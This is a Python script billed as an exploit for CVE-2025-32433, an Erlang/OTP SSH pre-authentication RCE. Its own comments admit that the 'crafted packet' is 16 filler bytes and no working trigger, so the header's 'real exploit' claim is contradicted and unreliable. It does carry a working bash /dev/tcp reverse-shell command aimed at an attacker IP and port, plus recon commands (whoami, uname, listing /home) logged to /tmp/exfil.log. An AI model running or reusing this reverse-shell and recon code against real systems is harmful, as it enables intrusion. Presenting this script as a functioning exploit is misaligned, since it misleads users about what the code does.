# ---------------------------------------------------------------------------------------
# WARNING: This is a real exploit. It can trigger remote code execution (RCE).
# 
# CVE: CVE-2025-32433 - Erlang/OTP SSH Pre-authentication RCE
#
# Use this script ONLY in environments where you have **explicit written permission**.
# Unauthorized use against public networks may be illegal and unethical.
#
# This script is provided for educational and research purposes only.
# The authors are not responsible for misuse or damage caused by this tool.
# ---------------------------------------------------------------------------------------

#!/usr/bin/env python3
import socket
import time
import os
 
# Lab IPs (private RFC 1918 ranges; adjust for the lab in use).
# NOTE(review): only target_ip is ever contacted over the network (port 22 is
# hard-coded in send_exploit). attacker_ip/attacker_port are the address the
# *local* host dials back to from trigger_reverse_shell(), which runs on the
# machine executing this script, not on the target.
target_ip: str = "192.168.1.100"
attacker_ip: str = "192.168.1.1"
attacker_port: int = 4444
 
def build_ssh_version():
    """Return the SSH identification line this client announces, CRLF-terminated.

    The software/version token ("ErlangTest_0.1") is a fixed, made-up string;
    it is the only thing a target's SSH log would record about this client.
    """
    banner = "SSH-2.0-ErlangTest_0.1"
    return f"{banner}\r\n".encode("ascii")
 
def build_crafted_packet():
    """Return 20 bytes: a 4-byte big-endian length field (16) followed by 16 x 0x41 ('A').

    This is filler rather than a protocol-valid SSH message: send_exploit()
    transmits it directly after the banner with no key exchange having taken
    place. As far as this file shows it is a placeholder, not an exploit
    payload for the CVE named in the header.
    """
    body = bytes([0x41]) * 16
    length_prefix = len(body).to_bytes(4, "big")
    return length_prefix + body
 
def trigger_reverse_shell():
    """Spawn an interactive bash reverse shell from the host running this script.

    This runs locally via os.system(); nothing here is sent to target_ip.
    The shell connects outbound to attacker_ip:attacker_port through bash's
    /dev/tcp redirection, with stdout/stderr (`>&`) and stdin (`0>&1`) bound
    to that socket. From a defender's view the observable artifact is a bash
    process on the operator's own host holding an outbound TCP connection.
    """
    print(f"[+] Triggering reverse shell to {attacker_ip}:{attacker_port}")
    # os.system() blocks until the spawned shell exits (immediately, if the
    # connection to the listener cannot be made), so the caller waits here.
    os.system(f"/bin/bash -c 'bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1'")
 
def simulate_post_exploitation():
    """Write a mock post-exploitation trail to /tmp/exfil.log on the local host.

    Everything here executes on the machine running this script (os.system
    calls and a local file append), not on target_ip, and nothing is
    transmitted anywhere. The log is opened in append mode, so repeated runs
    accumulate; the file is the only artifact this function produces.
    """
    print("[+] Simulating post-exploitation behavior...")
 
    # Command 1: whoami — records the invoking user.
    os.system("whoami >> /tmp/exfil.log")
 
    # Command 2: system info — kernel/hostname details of the local host.
    os.system("uname -a >> /tmp/exfil.log")
 
    # Command 3: show directory structure — listing of local /home/.
    os.system("ls -alh /home/ >> /tmp/exfil.log")
 
    # Command 4: dummy file access — two literal, hard-coded placeholder lines;
    # no real credentials are read from anywhere.
    with open("/tmp/exfil.log", "a") as f:
        f.write("\n[+] Simulated exfil of dummy credentials...\n")
        f.write("username: admin\npassword: hunter2\n")
 
    print("[+] Post-exploitation simulation written to /tmp/exfil.log")
 
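def send_exploit():
    """Connect to target_ip:22, send a banner plus filler bytes, then run the local simulation.

    What crosses the wire is build_ssh_version() followed, half a second
    later, by build_crafted_packet(). No key-exchange or authentication
    messages are exchanged, so — as far as this file shows — this does not
    implement a working trigger for the CVE named in the header; presumably
    the only remote effect is a connection attempt the target's SSH daemon
    would log. trigger_reverse_shell() and simulate_post_exploitation() then
    execute on *this* host after the socket has been closed.

    Raises:
        OSError: if the TCP connection or a send fails. The socket is closed
        on every exit path.
    """
    print(f"[+] Connecting to target {target_ip}:22...")
    # The context manager closes the socket even when connect() or sendall()
    # raises; a bare close() at the end would be skipped on those paths.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.connect((target_ip, 22))

        sock.sendall(build_ssh_version())
        print("[+] Sent SSH version string")

        time.sleep(0.5)

        sock.sendall(build_crafted_packet())
        print("[+] Sent crafted SSH pre-auth packet")

        time.sleep(0.5)
    # Socket is closed at this point, before any local activity starts.

    # Local-only simulation of the reverse shell and post-exploit phase.
    trigger_reverse_shell()
    time.sleep(1)
    simulate_post_exploitation()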
 
if __name__ == "__main__":
    # Script entry point; send_exploit() returns None, so the process exits
    # with status 0 unless an exception propagates.
    raise SystemExit(send_exploit())